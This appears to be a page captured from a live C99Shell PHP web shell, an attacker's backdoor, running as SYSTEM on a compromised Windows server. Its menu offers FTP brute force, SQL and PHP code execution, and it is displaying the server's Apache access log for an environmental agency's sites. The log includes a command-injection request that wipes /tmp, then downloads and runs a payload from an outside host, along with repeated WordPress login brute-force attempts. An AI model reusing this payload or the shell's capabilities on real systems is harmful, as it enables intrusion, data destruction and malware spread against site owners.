!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\nuevo\apache\logs\   drwxrwxrwx
Free 9.41 GB of 239.26 GB (3.93%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     access.2023.01.04.log (3.26 MB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
172.22.2.4 - - [03/Jan/2023:23:58:46 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [04/Jan/2023:00:00:28 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [03/Jan/2023:23:59:36 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52453
185.119.81.106 - - [04/Jan/2023:00:01:31 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.106 - - [04/Jan/2023:00:01:32 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
213.186.1.154 - - [04/Jan/2023:00:02:33 -0500] "GET /images/mantener-calidad-del-aire_optimized.jpeg HTTP/1.1" 200 67646
66.249.66.63 - - [04/Jan/2023:00:04:18 -0500] "-" 408 -
201.245.192.253 - - [04/Jan/2023:00:04:52 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
207.46.13.198 - - [04/Jan/2023:00:04:59 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 12503
216.245.221.92 - - [04/Jan/2023:00:05:28 -0500] "HEAD / HTTP/1.1" 200 -
168.119.100.88 - - [04/Jan/2023:00:05:53 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [04/Jan/2023:00:05:53 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [04/Jan/2023:00:04:36 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [04/Jan/2023:00:06:54 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [04/Jan/2023:00:05:26 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56474
40.77.167.33 - - [04/Jan/2023:00:07:38 -0500] "GET /sipse/faces/presentacion/sistema/anexos/cargarAnexoSolicitudProceso.xhtml HTTP/1.1" 302 -
40.77.167.33 - - [04/Jan/2023:00:07:38 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 12181
201.245.192.253 - - [04/Jan/2023:00:07:55 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
157.55.39.194 - - [04/Jan/2023:00:08:05 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202001/2001%20400-449.TIF HTTP/1.1" 200 9262392
104.28.103.105 - - [04/Jan/2023:00:08:32 -0500] "GET / HTTP/1.1" 200 319
104.28.103.105 - - [04/Jan/2023:00:08:32 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
201.245.192.253 - - [04/Jan/2023:00:08:56 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
186.86.34.62 - - [04/Jan/2023:00:09:32 -0500] "GET /piloto-de-etiquetado-herramienta-para-clasificar-ambientalmente-los-vehiculos-segun-cuanto-emiten.html HTTP/1.1" 200 985
216.245.221.92 - - [04/Jan/2023:00:10:28 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [04/Jan/2023:00:10:26 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [04/Jan/2023:00:11:16 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58185
66.249.66.63 - - [04/Jan/2023:00:13:36 -0500] "-" 408 -
201.245.192.253 - - [04/Jan/2023:00:13:57 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [04/Jan/2023:00:15:28 -0500] "HEAD / HTTP/1.1" 200 -
199.16.157.180 - - [04/Jan/2023:00:16:12 -0500] "GET /images/imagen-comunicado-podcast.jpg HTTP/1.1" 200 39765
172.22.2.4 - - [04/Jan/2023:00:16:15 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [04/Jan/2023:00:18:32 -0500] "GET /BLA/boletinlegal/admin/ HTTP/1.1" 200 2324
172.22.2.4 - - [04/Jan/2023:00:18:33 -0500] "GET /BLA/boletinlegal/admin/index_files/style.css HTTP/1.1" 200 6223
172.22.2.4 - - [04/Jan/2023:00:18:33 -0500] "GET /BLA/boletinlegal/admin/images/bg.png HTTP/1.1" 200 332965
172.22.2.4 - - [04/Jan/2023:00:18:33 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1320
172.22.2.4 - - [04/Jan/2023:00:17:06 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56825
201.245.192.253 - - [04/Jan/2023:00:18:56 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
201.245.192.253 - - [04/Jan/2023:00:19:25 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43589
201.245.192.253 - - [04/Jan/2023:00:19:28 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43931
66.249.66.63 - - [04/Jan/2023:00:20:04 -0500] "-" 408 -
172.22.2.4 - - [04/Jan/2023:00:20:09 -0500] "POST /BLA/boletinlegal/admin/usuarios/process.php HTTP/1.1" 302 -
172.22.2.4 - - [04/Jan/2023:00:20:09 -0500] "GET /BLA/boletinlegal/BLA/boletinlegal/admin/index.php HTTP/1.1" 404 1320
172.22.2.4 - - [04/Jan/2023:00:20:13 -0500] "GET /BLA/boletinlegal/BLA/boletinlegal/admin/index.php HTTP/1.1" 404 1320
216.245.221.92 - - [04/Jan/2023:00:20:28 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [04/Jan/2023:00:20:15 -0500] "GET /BLA/boletinlegal/admin/ HTTP/1.1" 200 8656
172.22.2.4 - - [04/Jan/2023:00:20:32 -0500] "GET /BLA/boletinlegal/admin/index_files/header.png HTTP/1.1" 200 240212
172.22.2.4 - - [04/Jan/2023:00:20:32 -0500] "GET /BLA/boletinlegal/admin/index_files/3_5.gif HTTP/1.1" 200 1633
172.22.2.4 - - [04/Jan/2023:00:20:32 -0500] "GET /BLA/boletinlegal/images/can.png HTTP/1.1" 200 37574
172.22.2.4 - - [04/Jan/2023:00:20:32 -0500] "GET /BLA/boletinlegal/admin/index_files/7_1.gif HTTP/1.1" 200 1455
172.22.2.4 - - [04/Jan/2023:00:20:32 -0500] "GET /BLA/boletinlegal/admin/index_files/7_5.gif HTTP/1.1" 200 1565
172.22.2.4 - - [04/Jan/2023:00:20:32 -0500] "GET /BLA/boletinlegal/admin/index_files/2_2.gif HTTP/1.1" 200 1728
172.22.2.4 - - [04/Jan/2023:00:20:32 -0500] "GET /BLA/boletinlegal/admin/index_files/2_4.gif HTTP/1.1" 200 1763
172.22.2.4 - - [04/Jan/2023:00:20:32 -0500] "GET /BLA/boletinlegal/admin/index_files/5_1.gif HTTP/1.1" 200 1623
172.22.2.4 - - [04/Jan/2023:00:20:32 -0500] "GET /BLA/boletinlegal/admin/index_files/index_files/tback.gif HTTP/1.1" 404 1362
172.22.2.4 - - [04/Jan/2023:00:22:53 -0500] "GET /BLA/boletinlegal/admin/actos/ingresar.php HTTP/1.1" 200 7143
172.22.2.4 - - [04/Jan/2023:00:22:53 -0500] "GET /BLA/boletinlegal/admin/css/default.css HTTP/1.1" 200 4379
172.22.2.4 - - [04/Jan/2023:00:22:53 -0500] "GET /BLA/boletinlegal/admin/js/jquery-1.3.1.min.js HTTP/1.1" 200 55272
172.22.2.4 - - [04/Jan/2023:00:22:53 -0500] "GET /BLA/boletinlegal/admin/js/jquery.functions.js HTTP/1.1" 200 2317
172.22.2.4 - - [04/Jan/2023:00:22:53 -0500] "GET /BLA/boletinlegal/admin/js/nicEdit-latest.js HTTP/1.1" 200 38373
172.22.2.4 - - [04/Jan/2023:00:22:53 -0500] "GET /BLA/boletinlegal/admin/img/h1.png HTTP/1.1" 200 3227
172.22.2.4 - - [04/Jan/2023:00:22:53 -0500] "GET /BLA/boletinlegal/admin/img/overlay.png HTTP/1.1" 200 984
172.22.2.4 - - [04/Jan/2023:00:22:53 -0500] "GET /BLA/boletinlegal/images/favicon.ico HTTP/1.1" 404 1356
130.211.54.158 - - [04/Jan/2023:00:23:39 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [04/Jan/2023:00:22:05 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [04/Jan/2023:00:23:55 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
185.119.81.105 - - [04/Jan/2023:00:24:05 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.105 - - [04/Jan/2023:00:24:05 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3670
172.22.2.4 - - [04/Jan/2023:00:22:56 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52942
216.245.221.92 - - [04/Jan/2023:00:25:28 -0500] "HEAD / HTTP/1.1" 200 -
173.252.83.14 - - [04/Jan/2023:00:26:21 -0500] "GET /images/mercados-campesinos-5-mayo.jpg HTTP/1.1" 200 95848
66.249.66.139 - - [04/Jan/2023:00:26:50 -0500] "-" 408 -
92.118.39.29 - - [04/Jan/2023:00:27:48 -0500] "GET / HTTP/1.1" 200 319
173.252.95.17 - - [04/Jan/2023:00:28:18 -0500] "GET /images/cr\xc3\xb3nica-29-nov-1_optimized.jpeg HTTP/1.1" 404 1034
201.245.192.253 - - [04/Jan/2023:00:28:54 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
201.245.192.253 - - [04/Jan/2023:00:29:26 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43589
201.245.192.253 - - [04/Jan/2023:00:29:28 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43931
172.22.2.4 - - [04/Jan/2023:00:27:56 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
159.65.30.115 - - [04/Jan/2023:00:29:45 -0500] "\x16\x03\x01" 400 226
159.65.30.115 - - [04/Jan/2023:00:29:45 -0500] "\x16\x03\x01" 400 226
159.65.30.115 - - [04/Jan/2023:00:29:46 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [04/Jan/2023:00:28:46 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57192
216.245.221.92 - - [04/Jan/2023:00:30:28 -0500] "HEAD / HTTP/1.1" 200 -
66.249.66.63 - - [04/Jan/2023:00:32:35 -0500] "-" 408 -
201.245.192.253 - - [04/Jan/2023:00:33:51 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [04/Jan/2023:00:33:46 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [04/Jan/2023:00:35:28 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [04/Jan/2023:00:34:36 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57824
66.249.66.63 - - [04/Jan/2023:00:38:32 -0500] "-" 408 -
201.245.192.253 - - [04/Jan/2023:00:38:51 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
201.245.192.253 - - [04/Jan/2023:00:39:25 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43589
201.245.192.253 - - [04/Jan/2023:00:39:28 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43931
216.245.221.92 - - [04/Jan/2023:00:40:28 -0500] "HEAD / HTTP/1.1" 200 -
185.119.81.108 - - [04/Jan/2023:00:41:06 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.108 - - [04/Jan/2023:00:41:07 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
172.22.2.4 - - [04/Jan/2023:00:39:35 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [04/Jan/2023:00:40:26 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52942
185.119.81.99 - - [04/Jan/2023:00:43:11 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.99 - - [04/Jan/2023:00:43:12 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
201.245.192.253 - - [04/Jan/2023:00:43:50 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
43.139.86.62 - - [04/Jan/2023:00:44:44 -0500] "GET /xmlrpc.php HTTP/1.1" 404 1034
157.55.39.194 - - [04/Jan/2023:00:44:59 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202000/2000%20950-999.tif HTTP/1.1" 200 4451157
66.249.66.193 - - [04/Jan/2023:00:45:03 -0500] "-" 408 -
216.245.221.92 - - [04/Jan/2023:00:45:28 -0500] "HEAD / HTTP/1.1" 200 -
183.136.225.32 - - [04/Jan/2023:00:46:43 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [04/Jan/2023:00:45:25 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [04/Jan/2023:00:46:16 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52942
201.245.192.253 - - [04/Jan/2023:00:48:49 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
94.102.61.10 - - [04/Jan/2023:00:49:16 -0500] "GET /portaldeninos/ HTTP/1.1" 200 110197
216.245.221.92 - - [04/Jan/2023:00:50:28 -0500] "HEAD / HTTP/1.1" 200 -
66.249.66.139 - - [04/Jan/2023:00:51:21 -0500] "-" 408 -
172.22.2.4 - - [04/Jan/2023:00:51:15 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
183.136.225.32 - - [04/Jan/2023:00:53:18 -0500] "GET / HTTP/1.1" 200 319
183.136.225.32 - - [04/Jan/2023:00:53:18 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
172.22.2.4 - - [04/Jan/2023:00:53:30 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
172.22.2.4 - - [04/Jan/2023:00:52:06 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59404
201.245.192.253 - - [04/Jan/2023:00:53:49 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [04/Jan/2023:00:55:28 -0500] "HEAD / HTTP/1.1" 200 -
40.77.167.33 - - [04/Jan/2023:00:55:51 -0500] "GET /galeria/galeria/fotos/Humedal-Santa-Mar%C3%ADa-del-Lago3G.jpg HTTP/1.1" 200 271832
8.242.189.243 - - [04/Jan/2023:00:56:40 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+heylitimysun.top/jaws;sh+/tmp/jaws HTTP/1.1" 404 1013
66.249.66.85 - - [04/Jan/2023:00:57:12 -0500] "-" 408 -
172.22.2.4 - - [04/Jan/2023:00:57:05 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [04/Jan/2023:00:58:47 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
185.119.81.106 - - [04/Jan/2023:00:58:56 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.106 - - [04/Jan/2023:00:58:57 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3650
172.22.2.4 - - [04/Jan/2023:00:58:17 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
172.22.2.4 - - [04/Jan/2023:00:57:56 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52453
173.252.107.118 - - [04/Jan/2023:00:59:52 -0500] "GET /avistamiento-de-aves-en-santa-maria-del-lago.html HTTP/1.1" 206 845
216.245.221.92 - - [04/Jan/2023:01:00:28 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.192 - - [04/Jan/2023:01:02:36 -0500] "GET /BLA/resoluciones/AUTOS%202015/1052.pdf HTTP/1.1" 304 -
114.119.142.37 - - [04/Jan/2023:01:02:48 -0500] "GET /sig/ECS/126PM04-PR04.pdf HTTP/1.1" 200 2983801
173.252.79.2 - - [04/Jan/2023:01:03:34 -0500] "GET /images/cr\xc3\xb3nica-29-nov-1_optimized.jpeg HTTP/1.1" 404 1034
201.245.192.253 - - [04/Jan/2023:01:03:46 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
205.185.118.237 - - [04/Jan/2023:01:03:52 -0500] "POST /boaform/admin/formLogin HTTP/1.1" 404 1186
114.119.147.91 - - [04/Jan/2023:01:04:09 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202013/1104.pdf HTTP/1.1" 200 724469
66.249.66.85 - - [04/Jan/2023:01:04:12 -0500] "-" 408 -
172.22.2.4 - - [04/Jan/2023:01:02:55 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
114.119.130.57 - - [04/Jan/2023:01:05:25 -0500] "GET /BLA/resoluciones/AUTOS%202014/0379.pdf HTTP/1.1" 200 500905
172.22.2.4 - - [04/Jan/2023:01:03:46 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57192
216.245.221.92 - - [04/Jan/2023:01:05:28 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [04/Jan/2023:01:08:45 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
66.249.66.85 - - [04/Jan/2023:01:10:05 -0500] "-" 408 -
172.22.2.4 - - [04/Jan/2023:01:08:45 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [04/Jan/2023:01:10:28 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [04/Jan/2023:01:09:36 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58185
152.61.192.232 - - [04/Jan/2023:01:13:14 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [04/Jan/2023:01:13:44 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
152.61.128.50 - - [04/Jan/2023:01:15:15 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [04/Jan/2023:01:15:28 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [04/Jan/2023:01:14:35 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [04/Jan/2023:01:15:26 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52453
157.55.39.194 - - [04/Jan/2023:01:17:40 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202000/2000%202350-2399.tif HTTP/1.1" 200 4845966
40.77.167.21 - - [04/Jan/2023:01:18:15 -0500] "GET /portaldeninos/2021/05/21/2070/ HTTP/1.1" 200 109949
66.249.64.73 - - [04/Jan/2023:01:18:23 -0500] "-" 408 -
201.245.192.253 - - [04/Jan/2023:01:18:43 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
114.119.160.75 - - [04/Jan/2023:01:19:20 -0500] "-" 408 -
201.245.192.253 - - [04/Jan/2023:01:19:26 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43275
201.245.192.253 - - [04/Jan/2023:01:19:29 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43772
216.245.221.92 - - [04/Jan/2023:01:20:28 -0500] "HEAD / HTTP/1.1" 200 -
69.171.251.14 - - [04/Jan/2023:01:20:40 -0500] "GET /images/Acuerdos%2001%20(1)%20(1).jpeg HTTP/1.1" 200 32884
200.114.49.9 - - [04/Jan/2023:01:20:57 -0500] "-" 408 -
114.119.131.123 - - [04/Jan/2023:01:20:59 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%2B2014/ HTTP/1.1" 200 13709
172.22.2.4 - - [04/Jan/2023:01:20:25 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
185.119.81.106 - - [04/Jan/2023:01:22:52 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.106 - - [04/Jan/2023:01:22:53 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
172.22.2.4 - - [04/Jan/2023:01:21:16 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56825
201.245.192.253 - - [04/Jan/2023:01:23:42 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
66.249.64.73 - - [04/Jan/2023:01:24:57 -0500] "-" 408 -
199.16.157.180 - - [04/Jan/2023:01:25:16 -0500] "GET /images/cr%C3%B3nica-29-nov-1_optimized.jpeg HTTP/1.1" 404 1034
216.245.221.92 - - [04/Jan/2023:01:25:28 -0500] "HEAD / HTTP/1.1" 200 -
185.119.81.106 - - [04/Jan/2023:01:26:37 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.106 - - [04/Jan/2023:01:26:38 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
172.22.2.4 - - [04/Jan/2023:01:26:16 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [04/Jan/2023:01:28:41 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
191.156.56.9 - - [04/Jan/2023:01:28:44 -0500] "GET /portaldeninos/ HTTP/1.1" 200 110197
191.156.53.71 - - [04/Jan/2023:01:28:45 -0500] "GET /portaldeninos/wp-content/uploads/useanyfont/uaf.css?ver=1589905315 HTTP/1.1" 200 408
191.156.60.130 - - [04/Jan/2023:01:28:46 -0500] "GET /portaldeninos/wp-content/themes/betheme/style.css?ver=20.9.6 HTTP/1.1" 200 287
191.156.60.130 - - [04/Jan/2023:01:28:45 -0500] "GET /portaldeninos/wp-includes/js/wp-emoji-release.min.js?ver=4.9.8 HTTP/1.1" 200 12026
191.156.56.9 - - [04/Jan/2023:01:28:45 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/CSS/Total-Soft-Gallery-Video-Widget.css?ver=4.9.8 HTTP/1.1" 200 51554
191.156.55.110 - - [04/Jan/2023:01:28:45 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/CSS/totalsoft.css?ver=4.9.8 HTTP/1.1" 200 40622
191.156.55.110 - - [04/Jan/2023:01:28:46 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/jplayer/css/jplayer.blue.monday.css?ver=20.9.6 HTTP/1.1" 200 9834
172.22.2.4 - - [04/Jan/2023:01:27:06 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52453
191.156.61.156 - - [04/Jan/2023:01:28:46 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/base.css?ver=20.9.6 HTTP/1.1" 200 57283
191.156.56.9 - - [04/Jan/2023:01:28:46 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/ui/jquery.ui.all.css?ver=20.9.6 HTTP/1.1" 200 18765
191.156.60.130 - - [04/Jan/2023:01:28:46 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/animations/animations.min.css?ver=20.9.6 HTTP/1.1" 200 58508
191.156.56.9 - - [04/Jan/2023:01:28:46 -0500] "GET /portaldeninos/wp-content/plugins/popup-maker/assets/css/site.min.css?ver=1.8.14 HTTP/1.1" 200 8260
191.156.60.130 - - [04/Jan/2023:01:28:46 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/shortcodes.css?ver=20.9.6 HTTP/1.1" 200 138889
191.156.60.130 - - [04/Jan/2023:01:28:46 -0500] "GET /portaldeninos/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1 HTTP/1.1" 200 10056
191.156.53.71 - - [04/Jan/2023:01:28:46 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/layout.css?ver=20.9.6 HTTP/1.1" 200 116639
191.156.55.110 - - [04/Jan/2023:01:28:46 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/responsive.css?ver=20.9.6 HTTP/1.1" 200 55740
191.156.61.156 - - [04/Jan/2023:01:28:46 -0500] "GET /portaldeninos/wp-content/plugins/google-analytics-for-wordpress/assets/js/frontend-gtag.min.js?ver=8.5.0 HTTP/1.1" 200 11801
191.156.60.130 - - [04/Jan/2023:01:28:46 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/core.min.js?ver=1.11.4 HTTP/1.1" 200 4000
191.156.60.130 - - [04/Jan/2023:01:28:46 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/JS/modernizr.custom.js?ver=4.9.8 HTTP/1.1" 200 9019
191.156.53.71 - - [04/Jan/2023:01:28:46 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/JS/Total-Soft-Gallery-Video-Widget.js?ver=4.9.8 HTTP/1.1" 200 80264
191.156.56.9 - - [04/Jan/2023:01:28:46 -0500] "GET /portaldeninos/wp-includes/js/jquery/jquery.js?ver=1.12.4 HTTP/1.1" 200 97184
191.156.56.9 - - [04/Jan/2023:01:28:47 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/widget.min.js?ver=1.11.4 HTTP/1.1" 200 6908
191.156.53.71 - - [04/Jan/2023:01:28:47 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/mouse.min.js?ver=1.11.4 HTTP/1.1" 200 3148
191.156.60.130 - - [04/Jan/2023:01:28:47 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/accordion.min.js?ver=1.11.4 HTTP/1.1" 200 8584
191.156.61.156 - - [04/Jan/2023:01:28:47 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/menu.js?ver=20.9.6 HTTP/1.1" 200 2449
191.156.55.110 - - [04/Jan/2023:01:28:47 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/animations/animations.min.js?ver=20.9.6 HTTP/1.1" 200 1896
191.156.56.9 - - [04/Jan/2023:01:28:47 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/tabs.min.js?ver=1.11.4 HTTP/1.1" 200 12110
191.156.53.71 - - [04/Jan/2023:01:28:47 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/sortable.min.js?ver=1.11.4 HTTP/1.1" 200 24899
191.156.61.156 - - [04/Jan/2023:01:28:47 -0500] "GET /portaldeninos/wp-content/uploads/2021/06/titulo-cabezote-ni%C3%B1os.png HTTP/1.1" 200 64425
191.156.55.110 - - [04/Jan/2023:01:28:47 -0500] "GET /portaldeninos/wp-content/uploads/2019/08/Logo-Ambientic.png HTTP/1.1" 200 22941
191.156.56.9 - - [04/Jan/2023:01:28:47 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/jplayer/jplayer.min.js?ver=20.9.6 HTTP/1.1" 200 52702
191.156.60.130 - - [04/Jan/2023:01:28:47 -0500] "GET /portaldeninos/wp-content/themes/betheme/fonts/mfn-icons.woff?93978679 HTTP/1.1" 200 80932
191.156.61.156 - - [04/Jan/2023:01:28:47 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/position.min.js?ver=1.11.4 HTTP/1.1" 200 6527
191.156.53.71 - - [04/Jan/2023:01:28:47 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/scripts.js?ver=20.9.6 HTTP/1.1" 200 77162
191.156.60.130 - - [04/Jan/2023:01:28:47 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/plugins.js?ver=20.9.6 HTTP/1.1" 200 197151
191.156.56.9 - - [04/Jan/2023:01:28:47 -0500] "GET /portaldeninos/wp-includes/js/wp-embed.min.js?ver=4.9.8 HTTP/1.1" 200 1398
191.156.60.130 - - [04/Jan/2023:01:28:47 -0500] "GET /portaldeninos/wp-content/uploads/2021/06/titulo-miambiente-ni%C3%B1os.png HTTP/1.1" 200 11944
191.156.55.110 - - [04/Jan/2023:01:28:47 -0500] "GET /portaldeninos/wp-content/plugins/popup-maker/assets/js/site.min.js?defer&ver=1.8.14 HTTP/1.1" 200 48457
191.156.55.110 - - [04/Jan/2023:01:28:48 -0500] "GET /portaldeninos/wp-content/uploads/2021/06/titulo-videos-ni%C3%B1os.png HTTP/1.1" 200 10502
191.156.55.110 - - [04/Jan/2023:01:28:48 -0500] "GET /portaldeninos/wp-content/uploads/2021/06/titulo-humedales-ni%C3%B1os.png HTTP/1.1" 200 13361
191.156.56.9 - - [04/Jan/2023:01:28:48 -0500] "GET /portaldeninos/wp-content/uploads/2020/01/Tierra-escenario.jpg HTTP/1.1" 200 181491
191.156.61.156 - - [04/Jan/2023:01:28:47 -0500] "GET /portaldeninos/wp-content/uploads/2018/10/oso.jpg HTTP/1.1" 200 305180
191.156.53.71 - - [04/Jan/2023:01:28:47 -0500] "GET /portaldeninos/wp-content/uploads/2020/01/Frailejon-escenario.jpg HTTP/1.1" 200 357472
191.156.61.156 - - [04/Jan/2023:01:28:49 -0500] "GET /portaldeninos/wp-content/uploads/2020/05/fb.jpg HTTP/1.1" 200 9893
191.156.60.130 - - [04/Jan/2023:01:28:48 -0500] "GET /portaldeninos/wp-content/uploads/2018/11/caneca.jpg HTTP/1.1" 200 262661
191.156.60.130 - - [04/Jan/2023:01:28:47 -0500] "GET /portaldeninos/wp-content/uploads/2018/11/tigrillo.jpg HTTP/1.1" 200 402961
